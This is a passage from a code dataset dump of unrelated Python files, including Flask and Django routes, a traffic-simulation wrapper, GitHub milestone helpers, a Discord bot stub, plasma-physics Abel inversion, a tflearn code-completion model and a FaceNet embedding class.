return render_template('about1.html')\n\n\n@app.route('/scores/<int:matid>', methods=['GET', 'POST'])\ndef scorecard(matid):\n    x = cb.glivescore(matid + 1)\n    if x[0] == \"Upcoming\":\n        return render_template(\"error.html\", msg=x[0])\n    elif len(x) == 1:\n        return render_template(\"error.html\", msg=x[0])\n    else:\n        td = dict()\n        td = x[8]\n        bat = x[1]\n        bow = x[3]\n        batn = td[str(bat['id'])]\n        bats = bat['score']\n        bown = td[str(bow['id'])]\n        bows = bow['score']\n        batsman = x[5]\n        bowler = x[6]\n\n        return render_template('scores.html', x=x, teamdata=x[9], batn=batn, bown=bown, bats=bats, bows=bows,\n                               batsman=batsman, bowler=bowler)\n\n\nif __name__ == '__main__':\n    app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"12115648","text":"books = {'Financial': 'Theodor Draiser', 'Rich dad, poor dad': 'Robert Kiyosaki', 'Think and get rich': 'Napoleon Hill'}\nreaders = {}\n\ndef get_info():\n    print(f'На данный момент список читателей такой:\\n{readers}')\n    print(f'Список книг такой:\\n{books}')\n\ndef give_book():\n    book = input(f'Какую книгу вы хотите получить? Выберите из\\n {books}\\nВведите только название: ')\n    reader = input('Введите имя: ')\n    author = books.get(book)\n    if book in books:\n        if reader in readers:\n            for k, v in readers.items():\n                if k == reader:\n                    v.update({book: author})\n        else:\n            readers.update({reader: {book: author for k, v in books.items()}})\n        books.pop(book)\n    else:\n        print('Эта книга недоступна')\n    print('Ваша заявка успешно оформлена!')\n    get_info()\n\ndef take_back_book():\n    choice = input('Вы хотите взять книгу или вернуть? (1 или 2) ')\n    if choice == '1':\n        give_book()\n    elif choice == '2':\n        reader = input('Ваше имя: ')\n        if reader in readers.keys():\n            for v in readers.values():\n                books.update(v.items())\n            readers.pop(reader)\n    get_info()\n    take_back_book()\n\ndef manager():\n    get_info()\n    give_book()\n    print('========================')\n    take_back_book()\n    print('========================')\n\n\nmanager()","sub_path":"library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"355908676","text":"\"\"\"\n    This module contains information related to a Simulation.\n    It is capable of:\n\n    - Loading the symuvia library \n    - Loading the XML file \n    - Launching a simulation for the corresponding XML file\n\"\"\"\n\nMAXSTEPS = 86400\n\nfrom datetime import datetime\nfrom lxml import etree\nfrom ctypes import cdll, create_string_buffer, c_int, byref, c_bool, c_double \n\nfrom ..func.container import Container\n\nclass Simulator():\n    \"\"\"\n    Simulator class can launch a simulation. \n    \"\"\"\n    def __init__(self, fullSymPath):\n        \"\"\"\n        Class constructor\n        :param string fullSymPath: string containing the library path to SymuVia \n        \"\"\"\n        self.sfullSymPath = fullSymPath\n        self.olibSymuVia = self.load_SymuViaLib()\n        self.iBufferString = 10000\n\n    def load_SymuViaLib(self):\n        \"\"\"\n        Library loader \n        \"\"\"\n        try:\n            oSimulator = cdll.LoadLibrary(self.sfullSymPath)\n        except:\n            print('Symuvia Library could not be loaded')\n        \n        return oSimulator\n\nclass Simulation(Simulator):\n    \"\"\"\n    Simulation parses the XML data for a particular case. When created, a simulator is associated.\n    \"\"\"\n\n    def __init__(self, fileName, fullSymPath):\n        \"\"\"\n        Class constructor\n        \n        :param string fileName: string containing the path to a Simulation file \n\n        :param string fullSymPath: string containing the library path to SymuVia \n        \"\"\"\n\n        super().__init__(fullSymPath)\n        print(f'Simulator created at: {fileName}')\n        self.sfileName = fileName\n        self.oSimulation = self.load_Simulation()\n\n    def load_Simulation(self):\n        \"\"\" Load XML Simulation file in order to perform simulation \"\"\"\n        try: \n            oSimulator = self.olibSymuVia\n            oSimulation = oSimulator.SymLoadNetworkEx(self.encoded_FileName())\n            print('Symuvia Library successfully loaded') \n        except:\n            print('Symuvia Library could not be loaded')\n        return oSimulation\n\n    def encoded_FileName(self):\n        \"\"\" Returns the file name encoded for the simulator \"\"\"\n        return self.sfileName.encode('UTF8')\n    \n    def run_Simulation(self):\n        \"\"\" Launches a full-time simulation \"\"\" \n        return self.olibSymuVia.SymRunEx(self.encoded_FileName())\n\n    def init_Simulation(self):\n        \"\"\" Initializes conditions for a step by step simulation \"\"\"\n        # Pointers\n        self.sRequest = create_string_buffer(self.iBufferString)\n        self.bEnd = c_int()\n        self.bSecond = c_bool(True)\n        self.bForce = c_int(1)\n        self.bSuccess = 1\n        self.oContainer = Container()\n\n    def set_NumberIterations(self, numIt = MAXSTEPS):\n        \"\"\" Find the number of iterations for a Simulation\n\n        :param int numIt: Integer indicating the maximum number of iterations\n        \"\"\"\n        self.load_XML()\n        sPathTime = 'SIMULATIONS/SIMULATION'\n        oElement = self.oXMLTree.xpath(sPathTime)[0].attrib\n        sTimeStep = oElement['pasdetemps']\n        sTimeStart = oElement['debut']\n        sTimeEnd = oElement['fin']\n        sDate = oElement['date']\n        sDateSt = sDate + ' ' + sTimeStart\n        sDateEd = sDate + ' ' + sTimeEnd\n        sDateFormat = '%Y-%m-%d %H:%M:%S'\n        oTimeSt = datetime.strptime(sDateSt, sDateFormat)\n        oTimeEd = datetime.strptime(sDateEd, sDateFormat)\n        fDeltaT = oTimeEd - oTimeSt\n        fDeltaT = fDeltaT.total_seconds()\n        nIterations = int(fDeltaT/float(sTimeStep))\n        return min(nIterations, numIt)\n\n    def load_XML(self):\n        \"\"\" Creates the XML object within Python \"\"\"\n        oTree = etree.parse(self.sfileName)\n        root = oTree.getroot()\n        self.oXMLTree = root\n\n    def run_SimulationByStep(self, numIt = MAXSTEPS):\n        \"\"\" Run a full simulation step by step \"\"\"\n        self.load_Simulation()\n        self.init_Simulation()\n\n        iIterations = self.set_NumberIterations(numIt)\n        step = iter(range(iIterations)) \n        while self.bSuccess>0:\n            try:\n                iIt = next(step)\n                print(f'Iteration: {iIt+1}')\n                self.run_Step() \n                self.oContainer.fill_Container(self.query_DataStep()) \n            except StopIteration:\n                print('Stop by iteration') \n                self.bSuccess = 0\n            except: \n                self.bSuccess = self.run_Step()\n                sRequest = self.query_DataStep()\n                print('Return from Symuvia Empty: {}'.format(sRequest))\n                self.bSuccess = 0\n\n    def run_Step(self):\n        \"\"\" Launches a single step of simulation \"\"\"\n        self.bSuccess = self.olibSymuVia.SymRunNextStepEx(self.sRequest, True, byref(self.bEnd))\n\n    def query_DataStep(self):\n        \"\"\" Query data from a step \"\"\"\n        return self.sRequest.value.decode('UTF8')","sub_path":"symupy/func/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":4961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"55646729","text":"from django.urls import path\nfrom django.conf.urls import url\nfrom App import views\n\nurlpatterns = [\n
path('', views.App, name='App'),\n    path('join', views.join, name='join'),\n    path('sdg', views.sdg, name='sdg'),\n    path('lda', views.lda, name='lda'),\n    path('module/', views.module, name='module'),\n    path('publication/', views.publication, name='publication'),\n    path('exportMod', views.export_modules_csv, name='export_modules_csv'),\n    path('exportPub', views.export_publications_csv, name='export_publications_csv'),\n]\n","sub_path":"App/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"383422418","text":"# coding: utf-8\n\nimport github.GithubObject\n\n\"\"\"\nDeal with \"named\" milestones. GitHub uses numbers to reference milestones.\nHowever, GitHub ensures the uniqueness of the title attribute within the\nrepository, so here the title is taken as the identifier. This does not\nallow renaming, but it should be OK for most uses.\n\nWARNING:\n\n* It seems that there is a bug in the repo.create_milestone method.\n  It does not work with the deadline parameter. The code below solves\n  this problem.\n\n* The date due_on returns something with hours although hours cannot be\n  set in the interface. It does not take into account hours in parameters.\n  One should use due_on.date() if comparison is required.\n\n\"\"\"\n\n\ndef getMilestone(repo, title):\n    \"\"\"\n    Return the milestone with the given title, or None if there is no such milestone in the repository\n    :param repo: repository\n    :param title: title of the milestone to search\n    :return: the milestone object or None\n    \"\"\"\n    milestones = repo.get_milestones()\n    for m in milestones:\n        if m.title == title:\n            return m\n    return None\n\ndef ensureMilestone(repo,\n                    title,\n                    description=github.GithubObject.NotSet,\n                    state=github.GithubObject.NotSet,\n                    # 'open' | 'closed'\n                    dueOn=github.GithubObject.NotSet,\n                    prefix=''):\n    m = getMilestone(repo, title)\n    if m is None:\n        print(prefix+'Creating milestone \"%s\"... ' % title)\n        m = repo.create_milestone(title)\n        # For some strange reason the method create_milestone\n        # does not work with the parameter due_on.\n        # So after creating the milestone, the code below\n        # sets additional parameters, in particular the due_on\n        m.edit(title, state, description, dueOn)\n        print(prefix+' milestone #%i created' % m.number)\n    else:\n        print(prefix+'Editing milestone \"%s\" ... ' % title)\n        m.edit(title, state, description, dueOn)\n        print(prefix+' milestone #%i edited' % m.number)\n    return m\n","sub_path":"githubbot/milestones.py","file_name":"milestones.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"422049473","text":"import os\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\nload_dotenv()\n\nclass MrMeeseek(commands.Bot):\n    def __init__(self):\n        super().__init__(command_prefix=\"/\")\n\n    async def on_ready(self):\n        print(f\"We have logged in as {self.user.display_name}\")\n\nmrmeeseek = MrMeeseek()\nmrmeeseek.run(os.getenv(\"TOKEN\"))\n","sub_path":"MrMeeseek.py","file_name":"MrMeeseek.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"399909299","text":"import os\nfrom datetime import date, timedelta\nfrom random import randint\nimport django\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"flowlityTest.settings\")\ndjango.setup()\n\n\nITEMS = ['Table', 'Chair', 'Plate', 'Knife']\n\n\ndef generate_items():\n    from inventory.models import Inventory\n    items_to_create = []\n    # find alternative to this thanks to itertools\n    for i, item in enumerate(ITEMS):\n        for j in range(60):\n            item_to_create = {}\n            item_to_create['product_name'] = item\n            item_to_create['product_id'] = i\n            item_to_create['date'] = date.today() + timedelta(days=-j)\n            item_to_create['inventory_level'] = randint(0, 30)\n            items_to_create.append(Inventory(**item_to_create))\n    print(len(items_to_create))\n    Inventory.objects.bulk_create(items_to_create)\n\n\ndef main():\n    generate_items()\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"inventory_data.py","file_name":"inventory_data.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"319883924","text":"# coding=utf-8\nfrom lib.config.Config import Config\n\nclass STLConfig(Config):\n    def __init__(self):\n        super(STLConfig, self).__init__()\n        self.NUM_OUTPUTS = 10\n        self.GPU_NUM = 1\n        self.BATCH_SIZE = 100\n        self.IMAGE_SIZE = 96\n        self.DATA_PATH = \"../data/STL/\"\n        self.GAN_DATA_PATH = \"../ganData/STL/train/\"\n        self.NUM_WORKERS_LOAD_IMAGE = 4\n        self.IMAGE_CHANNEL = 3\n        self.BATCH_SIZE = 50\n        self.EPOCH_NUM = 1000\n        self.LR_GENERATOR = 2e-4\n        self.LR_DISCRIMINATOR = 2e-4\n        self.BETA1 = 0.5\n        self.GPU_NUM = 2\n        self.NOISE_Z = 100\n\n        self.GENERATOR_FEATURES_NUM = 64\n        self.DISCRIMINATOR_FEATURES_NUM = 64\n        self.D_EVERY = 1  # train the discriminator once every batch\n        self.G_EVERY = 5  # train the generator once every 5 batches\n        self.DECAY_EVERY = 10  # save the model once every 10 epochs\n        self.SAVE_PATH = \"output/\"\n\n        self.LABELS = [\"airplane\",\n                       \"bird\",\n                       \"car\",\n                       \"cat\",\n                       \"deer\",\n                       \"dog\",\n                       \"horse\",\n                       \"monkey\",\n                       \"ship\",\n                       \"truck\"]","sub_path":"lib/config/STLConfig.py","file_name":"STLConfig.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"527508471","text":"import numpy as np\nimport math\n\n\ndef get_peak_to_valley(file):\n    temp_data = np.genfromtxt(file, skip_header=3)\n    peak_to_valley = temp_data[0]\n    return peak_to_valley\n\n\ndef image_to_double(im):\n    info = np.iinfo(im.dtype)\n    return im.astype(float)/info.max\n\n\ndef apply_threshold(image, t):\n    \"\"\"\n    image: image represented as a 2D array\n    t: number between 0 and 1\n    \"\"\"\n    image_max = np.amax(image)\n
    image_min = np.amin(image)\n    diff = image_max-image_min\n    threshold = image_min+diff*t\n    thresholded_image = np.copy(image)\n    thresholded_image[thresholded_image < threshold] = 0\n    return thresholded_image\n\n\ndef symmetrize_image(image, i):\n    \"\"\"\n    image: image represented as a 2D array\n    i: index of center of mass\n    returns one half of the symmetrized image\n    \"\"\"\n    n_pixels, _ = np.shape(image)\n    symmetrized_half = image[i, :]\n    j = 1\n    while j <= i and i+j < n_pixels:\n        temp = np.stack((image[i-j, :], image[i+j, :]))\n        average = np.mean(temp, axis=0)\n        symmetrized_half = np.vstack((symmetrized_half, average))\n        j += 1\n    return symmetrized_half\n\n\ndef get_index_of_center_of_mass_by_line(image_column):\n    \"\"\"\n    image_column: a column of an image represented as a 1D array\n    returns the index of the center of mass\n    \"\"\"\n    f = image_column\n    x = np.arange(1, len(f) + 1)\n    first_moment = calculate_moment(f, x, 1, 0)\n    total_mass = calculate_moment(f, x, 0, 0)\n    # The first moment divided by the total mass is the center of mass, i.e. a point in the interval x.\n    # Since x = [1, len(f)], the index of the center of mass should be calculated as below.\n    center_of_mass = first_moment/total_mass\n    index_of_center_of_mass = np.rint(center_of_mass-1)\n    return int(index_of_center_of_mass)\n\n\ndef get_index_of_center_of_mass(thresholded_image):\n    \"\"\"\n    thresholded_image: an image where a threshold has been applied\n    returns the row index that corresponds to the center of mass of the thresholded image\n    \"\"\"\n    return get_index_of_center_of_mass_by_line(np.sum(thresholded_image, axis=1))\n\n\ndef calculate_moment(f, x, n, c):\n    \"\"\"\n    f: function f(x) represented as a 1D array\n    n: order of moment\n    c: center value (0)\n    returns the moment calculated with the formula on https://en.wikipedia.org/wiki/Moment_(mathematics)\n    \"\"\"\n    integrand = np.multiply(np.power(x-c, n), f)\n    return np.trapz(integrand)\n\n\ndef rebuild_image(symmetrized_half):\n    n_rows, n_columns = np.shape(symmetrized_half)\n    full_image = np.zeros((2*n_rows-1, n_columns))\n    full_image[0:n_rows, :] = symmetrized_half\n    full_image[n_rows:, :] = np.flipud(symmetrized_half[0:-1, :])\n    return full_image\n\n\ndef abel_inversion(phase_map, thresholded_phase_map, y_calibration, wavelength):\n    index_of_center_of_mass = get_index_of_center_of_mass(thresholded_phase_map)\n    symmetrized_half_phase_map = symmetrize_image(phase_map, index_of_center_of_mass)\n    n_rows, n_columns = np.shape(symmetrized_half_phase_map)\n    abel_inverted_half_map = np.zeros((n_rows, n_columns))\n    i = 0\n    for column in symmetrized_half_phase_map.T:\n        abel_inverted_half_map[:, i] = abel_inversion_by_line(column, y_calibration)\n        i += 1\n    half_density_map = get_density_map(np.flipud(abel_inverted_half_map), wavelength)\n    return half_density_map, rebuild_image(half_density_map)\n\n\ndef get_density_map(m, wavelength):\n    c = 0.299792458  # [µm/fs]\n    pulsation = wavelength_to_pulsation(wavelength)\n    m = m*(c/pulsation)\n    m = 1+m\n    m = np.power(m, 2)\n    m = 1-m\n    density_map = m*pulsation_to_critical_density(pulsation)\n    return density_map\n\n\ndef wavelength_to_pulsation(wavelength):\n    \"\"\"\n    wavelength: wavelength in nanometer\n    \"\"\"\n    c = 299.792458  # [nm/fs]\n    pulsation = 2*math.pi*c/wavelength  # [rad/fs]\n    return pulsation\n\n\ndef pulsation_to_critical_density(pulsation):\n    c = 299792458  # [m/s]\n    epsilon_0 = 1/(math.pow(c, 2)*4*math.pi*1e-7)  # [C^2N^-1m^-2]\n    m_e = 9.10938215e-31  # [kg]\n    e = 1.602176487e-19  # [C]\n    temp = (epsilon_0*m_e)/math.pow(e,
2)*1e24*1e-18\n return math.pow(pulsation, 2)*temp\n\n\ndef abel_inversion_by_line(phase_half_map_column, dy):\n phase_array = np.asarray(phase_half_map_column)\n n_pixels = phase_array.size\n y = np.linspace(0, (n_pixels-1)*dy, n_pixels)\n s = derivative(phase_array, 0, 0, dy)\n inverted_column = []\n i = 0\n for r in y:\n sub_y = y[i:]\n sub_s = s[i:]\n temp = np.power(sub_y, 2)-math.pow(r, 2)\n temp = np.sqrt(temp)\n temp = np.reciprocal(temp, out=np.zeros_like(temp), where=temp != 0)\n integrand = np.multiply(sub_s, temp)\n integral = np.trapz(integrand, dx=dy)\n inverted_column.append(-integral/math.pi)\n i += 1\n return inverted_column\n\n\ndef integrate(f, dt):\n n = f.size\n integral = 0\n for i in range(0, n):\n if i == 0 or i == n-1:\n integral += f[i]\n else:\n integral += 2*f[i]\n return integral*dt/2\n\n\ndef derivative(x, ic, fc, dt):\n n = x.size\n y = []\n for i in range(n):\n if i == 0:\n d = (x[i+1]-ic)/(2*dt)\n elif i == n-1:\n d = (fc-x[i-1])/(2*dt)\n else:\n d = (x[i+1]-x[i-1])/(2*dt)\n y.append(d)\n return y\n","sub_path":"plasma_analysis/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"262991212","text":"import pandas as pd\nimport numpy as np\nfrom random import seed\nfrom random import random\n\n# Creates a dataframe which will be exported to an Excel spreadsheet.\ndataframe = pd.DataFrame(\n columns=['RFID_Nummer', 'Ammoniak', 'Fijnstof', 'CO2', 'Temperatuur'])\n\n# Generates random values between 7 and 21 for the column 'Ammoniak' with 500 rows.\ndataframe['Ammoniak'] = np.random.randint(7, 21, 500)\n\n# Generates random values between 25 and 30 for the column 'Fijnstof' with 500 rows.\ndataframe['Fijnstof'] = np.random.randint(25, 30, 500)\n\n# Generates random values between 0 and 20 for the column 'CO2' with 500 rows.\ndataframe['CO2'] = np.random.randint(0, 20, 500)\n\n# Generates random values between 16 and 18 for the column 'Temperatuur' with 500 rows.\ndataframe['Temperatuur'] = np.random.randint(16, 18, 500)\n\n# Creates RFID numbers used to identify the sensors which the FEEDR bot uses to navigate the barn.\ndataframe['RFID_Nummer'] = dataframe.index + 1\n\n# Saves the dataframe with generated values to an Excel spreadsheet.\nexport_excel = dataframe.to_excel(\n r'/Users/thymen/sieplo-team3/demo_data.xlsx', index=None, header=True)\n\n# Iterates over the values in column 'Ammoniak' to check if the levels are too high or critically high.\n# This can also be done with other columns\nfor index, row in dataframe.iterrows():\n if row['Ammoniak'] > 19:\n print(\"Ammoniak waarde in RFID\", row['RFID_Nummer'], \"is Kritiek\")\n elif row['Ammoniak'] > 15:\n print(\"Ammoniak waarde in RFID\", row['RFID_Nummer'], \"is te hoog\")\n","sub_path":"Python data genaratie/data_generatie.py","file_name":"data_generatie.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"567259400","text":"from pydoc import pager\r\nfrom flask import Blueprint, jsonify, request\r\nfrom app.repository.data_dict_repository import DataDictRepository\r\n\r\nrepo = DataDictRepository()\r\n\r\nblueprint = Blueprint('dict', __name__)\r\n\r\n@blueprint.route('/dict', methods=['GET'])\r\ndef dict_list():\r\n args = request.args\r\n q = None\r\n size = 200\r\n page = 0\r\n if 'q' in args:\r\n q = args['q']\r\n if 'size' in args:\r\n size = int(args['size'])\r\n if 'page' in 
args:\r\n        page = int(args['page']) - 1 \r\n        if page < 0:\r\n            page = 0\r\n\r\n    dictList = repo.list(page, size, q)\r\n    return jsonify({ "total": dictList[1], "data": [d.__json__() for d in dictList[0]] })\r\n    \r\n@blueprint.route('/dict/<system>/<table>', methods=['GET'])\r\ndef dict_get_by_table(system, table):\r\n    list = repo.get_by_table(system, table)\r\n    return jsonify([d.__json__() for d in list])","sub_path":"app/api/db_dict.py","file_name":"db_dict.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
+{"seq_id":"502511899","text":"class Solution:\n    def nextGreaterElement(self, n):\n        num = [c for c in str(n)]\n        i = len(num) - 1\n        while i > 0 and num[i - 1] >= num[i]:\n            i -= 1\n        if i == 0:\n            return -1\n        j = i\n        while j + 1 < len(num) and num[j + 1] > num[i - 1]:\n            j += 1\n        num[j], num[i - 1] = num[i - 1], num[j]\n        result = int(\"\".join(num[:i] + sorted(num[i:])))\n        return -1 if result >= 2 ** 31 else result\n","sub_path":"python/2020/dec/next-greater-element-iii.py","file_name":"next-greater-element-iii.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
+{"seq_id":"118346531","text":"import os\n\nimport numpy\nimport tflearn\n\n# determines how many tokens before and after are to be used during training\ncontext_length = 5\nprocessed_training_data_dir = \"./../training_data/processed_training_data/\"\n\nclass code_completion_context:\n\n    # converts a token (a dict) into a string\n    def token_to_string(self, token):\n        return token[\"type\"] + \"-@@-\" + token[\"value\"]\n    \n    # converts a string that represents a token back into a dict\n    def string_to_token(self, string):\n        splitted = string.split(\"-@@-\")\n        return {\"type\": splitted[0], \"value\": splitted[1]}\n    \n    # encodes a token string as a one-hot vector, using its unique ID as the index\n    def one_hot(self, string):\n        vector = [0] * len(self.string_to_number)\n        vector[self.string_to_number[string]] = 1\n        return vector\n    \n    \"\"\"\n    gets a set of token lists. Each list represents a program with tokens in the correct order. CHANGE REPRESENTATION HERE\n    Initializes dicts that map a unique number to each KIND of token. I.e.: with 50 different kinds of tokens, each kind gets a unique number.\n    Those are used to build one-hot encodings of the appropriate length.\n    X, Y pairs are created, consisting of one-hot encoded vectors.\n    :return: (x_list, y_list)\n    \"\"\"\n    def prepare_data(self, token_lists):\n        # encode tokens into one-hot vectors\n        all_token_strings = set()\n        for token_list in token_lists:\n            for token in token_list:\n                all_token_strings.add(self.token_to_string(token))\n        all_token_strings.add(\"padding-@@-padding\")  # add a padding token for corners\n        all_token_strings = list(all_token_strings)\n        all_token_strings.sort()\n        print(\"Unique tokens: \" + str(len(all_token_strings)))\n        self.string_to_number = dict()\n        self.number_to_string = dict()\n        max_number = 0\n        for token_string in all_token_strings:\n            self.string_to_number[token_string] = max_number\n            self.number_to_string[max_number] = token_string\n            max_number += 1\n\n        # prepare x,y pairs\n        xs = []\n        ys = []\n\n        # for efficiency reasons: load data that already is in the right format instead of processing it every time\n        if os.path.isfile(processed_training_data_dir + \"data_ys_context_\" + str(context_length) + \".npz\"):\n            print(\"loading training data from .npz files...\")\n            xs_dict = numpy.load(processed_training_data_dir + \"data_xs_context_\" + str(context_length) + \".npz\")\n            ys_dict = numpy.load(processed_training_data_dir + \"data_ys_context_\" + str(context_length) + \".npz\")\n            xs = xs_dict[list(xs_dict.keys())[0]].tolist()\n            ys = ys_dict[list(ys_dict.keys())[0]].tolist()\n            print(\"load done\")\n        else:\n            for token_list in token_lists:\n                for idx, token in enumerate(token_list):\n                    token_string = self.token_to_string(token)\n\n                    # get prefix and suffix\n                    prefix = token_list[:idx]\n                    if idx+1 < len(token_list):\n                        suffix = token_list[idx+1:]\n                    else:\n                        suffix = []\n\n                    # get one_hot_encodings\n                    prefix, suffix = self.trim_to_length(prefix, suffix, context_length)\n\n                    # create data for NN\n                    xs.append(self.one_hot_tokenlist(prefix) + self.one_hot_tokenlist(suffix))\n                    ys.append(self.one_hot(token_string))\n\n            # save data for later retraining\n            print(\"saving training data to .npz files...\")\n            numpy.savez_compressed(processed_training_data_dir + \"data_xs_context_\" + str(context_length) + \".npz\", numpy.array(xs))\n            numpy.savez_compressed(processed_training_data_dir + \"data_ys_context_\" + str(context_length) + \".npz\", numpy.array(ys))\n            print(\"save done\")\n\n        return (xs, ys)\n\n    # creates the neural network\n    def create_network(self):\n        # define input_data layer: shape tells us what the input data looks like.
First element defines batch size and should be \"None\"\n        self.net = tflearn.input_data(shape=[None, 2*context_length*len(self.string_to_number)])  # 2*context_length\n        # add a deep layer with 32 nodes (and linear activation function?)\n        self.net = tflearn.fully_connected(self.net, 32)\n        # add another deep layer with 32 nodes\n        self.net = tflearn.fully_connected(self.net, 32)\n        # add a deep layer with softmax activation and as many nodes as the one-hot encoding length\n        self.net = tflearn.fully_connected(self.net, len(self.string_to_number), activation='softmax')\n        # output with a regression layer\n        self.net = tflearn.regression(self.net)\n        self.model = tflearn.DNN(self.net)\n    \n    def load(self, token_lists, model_file):\n        self.prepare_data(token_lists)\n        self.create_network()\n        self.model.load(model_file)\n    \n    def train(self, token_lists, model_file):\n        (xs, ys) = self.prepare_data(token_lists)\n        self.create_network()\n        print(\"network created\")\n        self.model.fit(xs, ys, n_epoch=5, batch_size=128, show_metric=True)\n        print(\"model trained\")\n        self.model.save(model_file)\n    \n    # gets a hole in the code, i.e. a prefix and a suffix, and predicts what has to be in the hole\n    def query(self, prefix, suffix):\n        # get prefix and suffix of desired length\n        prefix, suffix = self.trim_to_length(prefix, suffix, context_length)\n        # encode prefix and suffix and concatenate them for NN input\n        x = self.one_hot_tokenlist(prefix) + self.one_hot_tokenlist(suffix)\n        y = self.model.predict([x])\n        predicted_seq = y[0]\n        #print(\"PREDICTION:\")\n        #print(y)\n        #print(\"=================\")\n        #print(predicted_seq)\n        if type(predicted_seq) is numpy.ndarray:\n            predicted_seq = predicted_seq.tolist()\n        best_number = predicted_seq.index(max(predicted_seq))\n        best_string = self.number_to_string[best_number]\n        best_token = self.string_to_token(best_string)\n        # return prediction as a list, containing the predicted token as a dict\n        return [best_token]\n    \n    def trim_to_length(self, prefix:list, suffix:list, final_length:int):\n        \"\"\"\n        receives a list of prefix and suffix tokens and trims them to the desired length, adding padding if necessary\n        \"\"\"\n\n        if len(prefix) < final_length:\n            #print(\"prefix <\")\n            needed_padding = final_length - len(prefix)\n            prefix = [{\"type\": \"padding\", \"value\": \"padding\"}] * needed_padding + prefix\n        elif len(prefix) > final_length:\n            #print(\"prefix >\")\n            prefix = prefix[-final_length:]\n\n        if len(suffix) < final_length:\n            #print(\"suffix <\")\n            needed_padding = final_length - len(suffix)\n            suffix = suffix + [{\"type\": \"padding\", \"value\": \"padding\"}] * needed_padding\n        elif len(suffix) > final_length:\n            #print(\"suffix >\")\n            suffix = suffix[:final_length]\n        #print(\"return from trim with prefix=\")\n        #print(prefix)\n        #print(\"suffix=\")\n        #print(suffix)\n\n        return (prefix, suffix)\n\n    def one_hot_tokenlist(self, tokenlist):\n        \"\"\"\n        takes a list of tokens encoded as dicts and returns the concatenated one-hot encodings of all tokens\n        \"\"\"\n        one_hot_encodings = []\n        for token in tokenlist:\n            one_hot_encodings = one_hot_encodings + self.one_hot(self.token_to_string(token))\n\n        return one_hot_encodings","sub_path":"src/code_completion_context.py","file_name":"code_completion_context.py","file_ext":"py","file_size_in_byte":7785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
+{"seq_id":"171344492","text":"import tensorflow as tf\nfrom .facenet import facenet\nimport
cv2 as cv\n\n\nclass FacenetEmbedding:\n def __init__(self, model_dir_path):\n self.img_size = (160, 160)\n with tf.Graph().as_default():\n self.sess = tf.InteractiveSession()\n facenet.load_model(model_dir_path)\n self.images_placeholder = tf.get_default_graph().get_tensor_by_name('input:0')\n self.images_placeholder = tf.image.resize_images(self.images_placeholder, self.img_size)\n self.embeddings_placeholder = tf.get_default_graph().get_tensor_by_name('embeddings:0')\n self.phase_train_placeholder = tf.get_default_graph().get_tensor_by_name('phase_train:0')\n \n def extract(self, img_path):\n img = cv.imread(img_path, 1) # RGB image\n img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n resized_img = cv.resize(img, self.img_size, interpolation=cv.INTER_AREA)\n prewithened = facenet.prewhiten(resized_img)\n\n # Get Embedding Here\n reshaped_img = prewithened.reshape(-1, self.img_size[0], self.img_size[1], 3)\n feed_dict = {self.images_placeholder:reshaped_img, self.phase_train_placeholder:False}\n features = self.sess.run(self.embeddings_placeholder, feed_dict=feed_dict)\n return features[0]\n \n def extract_image(self, img):\n resized_img = cv.resize(img, self.img_size, interpolation=cv.INTER_AREA)\n prewithened = facenet.prewhiten(resized_img)\n\n # Get Embedding Here\n reshaped_img = prewithened.reshape(-1, self.img_size[0], self.img_size[1], 3)\n feed_dict = {self.images_placeholder:reshaped_img, self.phase_train_placeholder:False}\n features = self.sess.run(self.embeddings_placeholder, feed_dict=feed_dict)\n return features[0]\n\n def _image_to_embedding_batch(self, img_path_list):\n images = []\n for img_path in img_path_list:\n img = cv.imread(img_path, 1) # RGB image\n img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n resized_img = cv.resize(img, self.img_size, interpolation=cv.INTER_AREA)\n prewithened = facenet.prewhiten(resized_img)\n images.append(prewithened)\n \n images = np.array(images)\n reshaped_images = images.reshape(-1, self.img_size[0], self.img_size[1], 3)\n feed_dict = {self.images_placeholder:reshaped_images, self.phase_train_placeholder:False}\n embedding_result = self.sess.run(self.embeddings_placeholder, feed_dict=feed_dict)\n return embedding_result\n \n def close_session(self):\n self.sess.close()\n tf.reset_default_graph()","sub_path":"src/main/python/app/reidentification/feature_extractor/facenet_embedding.py","file_name":"facenet_embedding.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"99536055","text":"# matplotlib.use(\"TKAgg\")\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport numpy as np\nimport 